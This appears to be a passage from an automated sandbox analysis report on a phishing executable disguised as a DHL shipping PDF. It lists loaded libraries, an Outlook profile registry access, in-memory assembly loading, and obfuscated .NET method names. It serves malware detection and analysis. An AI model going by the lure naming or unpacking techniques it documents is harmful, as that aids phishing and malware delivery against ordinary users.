                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: iconcodecservice.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: NKUn.pdb source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: Binary string: NKUn.pdbSHA2569x source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe

                  Data Obfuscation

                  barindex
                  .NET source code contains potential unpacker
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.2c9f698.1.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.55c0000.6.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, SXeNjVTESUiPlIoGVN.cs.Net Code: X6gCnMyEEf System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, SXeNjVTESUiPlIoGVN.cs.Net Code: X6gCnMyEEf System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, SXeNjVTESUiPlIoGVN.cs.Net Code: X6gCnMyEEf System.Reflection.Assembly.Load(byte[])
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeStatic PE information: 0xBAE167AD [Thu May 9 14:11:57 2069 UTC]
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0714A34A push eax; ret 0_2_0714A34D
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_07141CEE push ds; retf 0_2_07141CEF
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeStatic PE information: section name: .text entropy: 7.711256554162364
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, MfBcmtyiiOcv45FyA6.csHigh entropy of concatenated method names: 'zNnucbZK9M', 'BeCumytkiQ', 'HrIuuHoGSh', 'XRRuLGTjF0', 'Wrdu97fluU', 'P36uHtly4o', 'Dispose', 'HAps4ibK2S', 'HVasd7VHRE', 'rCksij7bdl'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, xNZtbo8jW3j16KHc9B.csHigh entropy of concatenated method names: 'dbKSiHv0Pp', 'dO8SRWYBaa', 'm3ESa5jjHx', 'b02SX7VEtg', 'lROSujTmA5', 'xqtSTVGddt', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, deToFC7XTWvUtFM6S9.csHigh entropy of concatenated method names: 'ToString', 'v55kN7wBHn', 'xybkx9XSJp', 'wOKkhDUiCO', 'Yrwk1gjQgj', 'O7MkeQDZ2y', 'R2Lk65F8Ry', 'QF8k08hQm7', 'slxkPnOga4', 'sFQkjNOeRj'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, Pwd2CcULBNau6IqyCn.csHigh entropy of concatenated method names: 'hbqcJJkrCy', 'eINc2abhid', 'DT0cUVkIvm', 'TebcMjnAtT', 'EDhcxoxS9l', 'wwZchmmw95', 'QqUc16Pack', 'eO0ces1xIM', 'oBXc6etImu', 'YEJc0a3bx0'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, BqQxfQzLLQbFtPRW3J.csHigh entropy of concatenated method names: 'HiMSfbaJWY', 'UZgSYLHFiS', 'dOgSD9YEWk', 'fiPStMKa2h', 'uMdSxhuhvH', 'zn8S1o6wK1', 'XJrSeJxbXt', 'h1kSHKidTj', 'VNVSG0RGt1', 'BAlSFM6MyH'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, I7MtYtpPZaFAheexDu.csHigh entropy of concatenated method names: 'XPAnY10wV', 'RAUwK3wxX', 'jCRfkcyS2', 'of9Q8SLlg', 'J7dD2hgoc', 'pgmEZN5DI', 'fCc5SV3IDrSUcndWMe', 'FEhI6JrqGTkxZyNDwW', 'o5csSYsRa', 'S8MSDgxYc'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, dRkct4CeFnMgMmS3ds.csHigh entropy of concatenated method names: 'TiR5XZZiMm', 'GgN5TbupTa', 'l1F5rrJSFk', 'cax5K41uki', 'mCs5c8aFiG', 'I8Q5kkgBG0', 'tXodXri4e3Pss4Tgc0', 'zv7lhwaoETO3SJ1wGJ', 'CVD3MTlb6RZ9W6erQE', 'wV3557vWaP'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, iZZiMmYtgNbupTaoiP.csHigh entropy of concatenated method names: 'W7PdUlLGPM', 'KQcdMhvy8v', 'q7yd7OeGl6', 'Sa7dZiWSgJ', 'PP7dWHpbZB', 'QNtdqcj5Os', 'WtfdyIuwae', 'kOydoBgQii', 'elhdBE2tJl', 'ONCd86Ixv3'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, ErUi7lD1FrJSFkpax4.csHigh entropy of concatenated method names: 'UeIiwtuIyM', 'jwiifH8AFc', 'GP5iYvmYMZ', 'QeRiDBUgLI', 'lZZic6DkXR', 'up9ikVsMPg', 'KuDim7tHdW', 'zB9isjL9Mo', 'Tc7iuoSaYe', 'WTZiSh4CaK'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, awiqG603sLp4n4D4Pi.csHigh entropy of concatenated method names: 'N31X4gDs4M', 'bh6Xi9goVO', 'NuBXalSu3I', 'Kfna8FIG3P', 'B0iazrEgCu', 'htfXbiS8mJ', 'FxLX51rNQT', 'qq9XpMclrN', 'NmdXVi7D9S', 'M4gXCgP6hW'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, fIE1H5BiCREqRqSkOl.csHigh entropy of concatenated method names: 'aAiutRbCK4', 'oC2uxFIrSD', 'myJuh3kglP', 'tk6u11c8Nd', 'A6sueL7kSN', 'JNUu6TjHZV', 'vTMu0gU4Sd', 'KFUuPU4ayK', 'aTWujw5S8f', 'LR5uJNag6t'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, LQxvD75CeVNpyj0oPCK.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'aYJ3u0m8gj', 'aUT3S76k24', 'CwQ3LuP546', 'z9i33GGlli', 'xgw39BUdgW', 'XaE3vDRD7p', 'JgC3HkXNiU'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, yiG18QtkgBG0q72fMG.csHigh entropy of concatenated method names: 'xrIaOqC6qj', 'RECadPc6uQ', 'KQyaR0KVG4', 'qqFaXEeVy9', 'KARaT9eRwN', 'e9ERWoEQnU', 'JBRRquaeAj', 'wvFRyWGtno', 'NefRoINMhT', 'kllRBoP378'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, MuxZ4DZLQy9qJCXI4U.csHigh entropy of concatenated method names: 'T5SmrXVfSB', 'AMrmKQSFtk', 'ToString', 'IXHm4DdOdY', 'jGYmdLDfFD', 'fBfmiWEUPX', 'v3nmRv0T0c', 'iJXmaQUKyh', 'kGomXxxKXW', 'tOsmTtyWoF'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, nk1RHsjxXGk2crEfVF.csHigh entropy of concatenated method names: 'EsKXGPyr6m', 'fdUXF2CAUx', 'Y5hXnNpjVK', 'dQlXwH7TtP', 'Td4XgwpCRE', 'TZHXfVdg2x', 'xepXQZHbcG', 'Q4gXY6b6cD', 'bUiXDtX1ir', 'gqvXElWeOQ'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, IukijGEZYdQjGrCs8a.csHigh entropy of concatenated method names: 'unWRgWvK5S', 'UErRQV91GE', 'tVfihCDovu', 'cWFi1oE44J', 'eM3ie0f3t5', 'qoCi6TpxWB', 'yiai0hP8VA', 'WPpiPPNBl3', 'CkCijUXMu2', 'CJqiJtLvpU'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, jyMCAX5bjsK0ZXc3xrI.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CMVSNdTnH9', 'toJS2I4Gx2', 'y1WSIk5Kx7', 'jxaSUwWFEX', 'FYZSM7cCwZ', 'jQYS72RMxp', 'WrHSZLHkZB'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, SXeNjVTESUiPlIoGVN.csHigh entropy of concatenated method names: 'NQTVORTIqk', 'hlPV41o3Hv', 'RQ6VdPgZbO', 'bJ0VidnE9I', 'hnrVR7iCnL', 'RppVaQLIZb', 'XVTVXtd8Ly', 'wKMVTjvUMt', 'sdAVlQ2yR3', 'whHVrZOFnV'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, xnApCVIMjrAdI14lEe.csHigh entropy of concatenated method names: 'LuOAYNVVHs', 'xlxADBl0J6', 'OL0AtQ7EN0', 'TLOAxttZHN', 'oBhA14XYjv', 'KsVAeMjED8', 'cL6A0H2A5U', 'w1uAP4U135', 'CxGAJjB2RQ', 'OhdAN7y352'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, eVQ1hw554PPm3rQXRCb.csHigh entropy of concatenated method names: 'h85S8Xvo3Y', 'UoMSz2136K', 'P0nLbbdiTj', 'hmkL5eQgcf', 'MruLp8CpCm', 'AN7LVupXLR', 'sohLCKn59q', 'vAjLOGuoWN', 'Y46L4Y3qHT', 'XnTLdH4msA'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, RMxiovdXSF96pWK4ss.csHigh entropy of concatenated method names: 'Dispose', 'fcv5B45FyA', 'BJwpxEWrFX', 'Feo4tAAH3f', 'K0o58JZ1Z8', 'MeX5zjNqDU', 'ProcessDialogKey', 'oPdpbIE1H5', 'gCRp5EqRqS', 'pOlppGNZtb'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, MfBcmtyiiOcv45FyA6.csHigh entropy of concatenated method names: 'zNnucbZK9M', 'BeCumytkiQ', 'HrIuuHoGSh', 'XRRuLGTjF0', 'Wrdu97fluU', 'P36uHtly4o', 'Dispose', 'HAps4ibK2S', 'HVasd7VHRE', 'rCksij7bdl'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, xNZtbo8jW3j16KHc9B.csHigh entropy of concatenated method names: 'dbKSiHv0Pp', 'dO8SRWYBaa', 'm3ESa5jjHx', 'b02SX7VEtg', 'lROSujTmA5', 'xqtSTVGddt', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, deToFC7XTWvUtFM6S9.csHigh entropy of concatenated method names: 'ToString', 'v55kN7wBHn', 'xybkx9XSJp', 'wOKkhDUiCO', 'Yrwk1gjQgj', 'O7MkeQDZ2y', 'R2Lk65F8Ry', 'QF8k08hQm7', 'slxkPnOga4', 'sFQkjNOeRj'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, Pwd2CcULBNau6IqyCn.csHigh entropy of concatenated method names: 'hbqcJJkrCy', 'eINc2abhid', 'DT0cUVkIvm', 'TebcMjnAtT', 'EDhcxoxS9l', 'wwZchmmw95', 'QqUc16Pack', 'eO0ces1xIM', 'oBXc6etImu', 'YEJc0a3bx0'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, BqQxfQzLLQbFtPRW3J.csHigh entropy of concatenated method names: 'HiMSfbaJWY', 'UZgSYLHFiS', 'dOgSD9YEWk', 'fiPStMKa2h', 'uMdSxhuhvH', 'zn8S1o6wK1', 'XJrSeJxbXt', 'h1kSHKidTj', 'VNVSG0RGt1', 'BAlSFM6MyH'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, I7MtYtpPZaFAheexDu.csHigh entropy of concatenated method names: 'XPAnY10wV', 'RAUwK3wxX', 'jCRfkcyS2', 'of9Q8SLlg', 'J7dD2hgoc', 'pgmEZN5DI', 'fCc5SV3IDrSUcndWMe', 'FEhI6JrqGTkxZyNDwW', 'o5csSYsRa', 'S8MSDgxYc'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, dRkct4CeFnMgMmS3ds.csHigh entropy of concatenated method names: 'TiR5XZZiMm', 'GgN5TbupTa', 'l1F5rrJSFk', 'cax5K41uki', 'mCs5c8aFiG', 'I8Q5kkgBG0', 'tXodXri4e3Pss4Tgc0', 'zv7lhwaoETO3SJ1wGJ', 'CVD3MTlb6RZ9W6erQE', 'wV3557vWaP'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, iZZiMmYtgNbupTaoiP.csHigh entropy of concatenated method names: 'W7PdUlLGPM', 'KQcdMhvy8v', 'q7yd7OeGl6', 'Sa7dZiWSgJ', 'PP7dWHpbZB', 'QNtdqcj5Os', 'WtfdyIuwae', 'kOydoBgQii', 'elhdBE2tJl', 'ONCd86Ixv3'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, ErUi7lD1FrJSFkpax4.csHigh entropy of concatenated method names: 'UeIiwtuIyM', 'jwiifH8AFc', 'GP5iYvmYMZ', 'QeRiDBUgLI', 'lZZic6DkXR', 'up9ikVsMPg', 'KuDim7tHdW', 'zB9isjL9Mo', 'Tc7iuoSaYe', 'WTZiSh4CaK'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, awiqG603sLp4n4D4Pi.csHigh entropy of concatenated method names: 'N31X4gDs4M', 'bh6Xi9goVO', 'NuBXalSu3I', 'Kfna8FIG3P', 'B0iazrEgCu', 'htfXbiS8mJ', 'FxLX51rNQT', 'qq9XpMclrN', 'NmdXVi7D9S', 'M4gXCgP6hW'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, fIE1H5BiCREqRqSkOl.csHigh entropy of concatenated method names: 'aAiutRbCK4', 'oC2uxFIrSD', 'myJuh3kglP', 'tk6u11c8Nd', 'A6sueL7kSN', 'JNUu6TjHZV', 'vTMu0gU4Sd', 'KFUuPU4ayK', 'aTWujw5S8f', 'LR5uJNag6t'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, LQxvD75CeVNpyj0oPCK.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'aYJ3u0m8gj', 'aUT3S76k24', 'CwQ3LuP546', 'z9i33GGlli', 'xgw39BUdgW', 'XaE3vDRD7p', 'JgC3HkXNiU'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, yiG18QtkgBG0q72fMG.csHigh entropy of concatenated method names: 'xrIaOqC6qj', 'RECadPc6uQ', 'KQyaR0KVG4', 'qqFaXEeVy9', 'KARaT9eRwN', 'e9ERWoEQnU', 'JBRRquaeAj', 'wvFRyWGtno', 'NefRoINMhT', 'kllRBoP378'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, MuxZ4DZLQy9qJCXI4U.csHigh entropy of concatenated method names: 'T5SmrXVfSB', 'AMrmKQSFtk', 'ToString', 'IXHm4DdOdY', 'jGYmdLDfFD', 'fBfmiWEUPX', 'v3nmRv0T0c', 'iJXmaQUKyh', 'kGomXxxKXW', 'tOsmTtyWoF'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, nk1RHsjxXGk2crEfVF.csHigh entropy of concatenated method names: 'EsKXGPyr6m', 'fdUXF2CAUx', 'Y5hXnNpjVK', 'dQlXwH7TtP', 'Td4XgwpCRE', 'TZHXfVdg2x', 'xepXQZHbcG', 'Q4gXY6b6cD', 'bUiXDtX1ir', 'gqvXElWeOQ'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, IukijGEZYdQjGrCs8a.csHigh entropy of concatenated method names: 'unWRgWvK5S', 'UErRQV91GE', 'tVfihCDovu', 'cWFi1oE44J', 'eM3ie0f3t5', 'qoCi6TpxWB', 'yiai0hP8VA', 'WPpiPPNBl3', 'CkCijUXMu2', 'CJqiJtLvpU'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, jyMCAX5bjsK0ZXc3xrI.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CMVSNdTnH9', 'toJS2I4Gx2', 'y1WSIk5Kx7', 'jxaSUwWFEX', 'FYZSM7cCwZ', 'jQYS72RMxp', 'WrHSZLHkZB'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, SXeNjVTESUiPlIoGVN.csHigh entropy of concatenated method names: 'NQTVORTIqk', 'hlPV41o3Hv', 'RQ6VdPgZbO', 'bJ0VidnE9I', 'hnrVR7iCnL', 'RppVaQLIZb', 'XVTVXtd8Ly', 'wKMVTjvUMt', 'sdAVlQ2yR3', 'whHVrZOFnV'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, xnApCVIMjrAdI14lEe.csHigh entropy of concatenated method names: 'LuOAYNVVHs', 'xlxADBl0J6', 'OL0AtQ7EN0', 'TLOAxttZHN', 'oBhA14XYjv', 'KsVAeMjED8', 'cL6A0H2A5U', 'w1uAP4U135', 'CxGAJjB2RQ', 'OhdAN7y352'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, eVQ1hw554PPm3rQXRCb.csHigh entropy of concatenated method names: 'h85S8Xvo3Y', 'UoMSz2136K', 'P0nLbbdiTj', 'hmkL5eQgcf', 'MruLp8CpCm', 'AN7LVupXLR', 'sohLCKn59q', 'vAjLOGuoWN', 'Y46L4Y3qHT', 'XnTLdH4msA'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, RMxiovdXSF96pWK4ss.csHigh entropy of concatenated method names: 'Dispose', 'fcv5B45FyA', 'BJwpxEWrFX', 'Feo4tAAH3f', 'K0o58JZ1Z8', 'MeX5zjNqDU', 'ProcessDialogKey', 'oPdpbIE1H5', 'gCRp5EqRqS', 'pOlppGNZtb'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, MfBcmtyiiOcv45FyA6.csHigh entropy of concatenated method names: 'zNnucbZK9M', 'BeCumytkiQ', 'HrIuuHoGSh', 'XRRuLGTjF0', 'Wrdu97fluU', 'P36uHtly4o', 'Dispose', 'HAps4ibK2S', 'HVasd7VHRE', 'rCksij7bdl'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, xNZtbo8jW3j16KHc9B.csHigh entropy of concatenated method names: 'dbKSiHv0Pp', 'dO8SRWYBaa', 'm3ESa5jjHx', 'b02SX7VEtg', 'lROSujTmA5', 'xqtSTVGddt', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, deToFC7XTWvUtFM6S9.csHigh entropy of concatenated method names: 'ToString', 'v55kN7wBHn', 'xybkx9XSJp', 'wOKkhDUiCO', 'Yrwk1gjQgj', 'O7MkeQDZ2y', 'R2Lk65F8Ry', 'QF8k08hQm7', 'slxkPnOga4', 'sFQkjNOeRj'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, Pwd2CcULBNau6IqyCn.csHigh entropy of concatenated method names: 'hbqcJJkrCy', 'eINc2abhid', 'DT0cUVkIvm', 'TebcMjnAtT', 'EDhcxoxS9l', 'wwZchmmw95', 'QqUc16Pack', 'eO0ces1xIM', 'oBXc6etImu', 'YEJc0a3bx0'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, BqQxfQzLLQbFtPRW3J.csHigh entropy of concatenated method names: 'HiMSfbaJWY', 'UZgSYLHFiS', 'dOgSD9YEWk', 'fiPStMKa2h', 'uMdSxhuhvH', 'zn8S1o6wK1', 'XJrSeJxbXt', 'h1kSHKidTj', 'VNVSG0RGt1', 'BAlSFM6MyH'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, I7MtYtpPZaFAheexDu.csHigh entropy of concatenated method names: 'XPAnY10wV', 'RAUwK3wxX', 'jCRfkcyS2', 'of9Q8SLlg', 'J7dD2hgoc', 'pgmEZN5DI', 'fCc5SV3IDrSUcndWMe', 'FEhI6JrqGTkxZyNDwW', 'o5csSYsRa', 'S8MSDgxYc'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, dRkct4CeFnMgMmS3ds.csHigh entropy of concatenated method names: 'TiR5XZZiMm', 'GgN5TbupTa', 'l1F5rrJSFk', 'cax5K41uki', 'mCs5c8aFiG', 'I8Q5kkgBG0', 'tXodXri4e3Pss4Tgc0', 'zv7lhwaoETO3SJ1wGJ', 'CVD3MTlb6RZ9W6erQE', 'wV3557vWaP'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, iZZiMmYtgNbupTaoiP.csHigh entropy of concatenated method names: 'W7PdUlLGPM', 'KQcdMhvy8v', 'q7yd7OeGl6', 'Sa7dZiWSgJ', 'PP7dWHpbZB', 'QNtdqcj5Os', 'WtfdyIuwae', 'kOydoBgQii', 'elhdBE2tJl', 'ONCd86Ixv3'
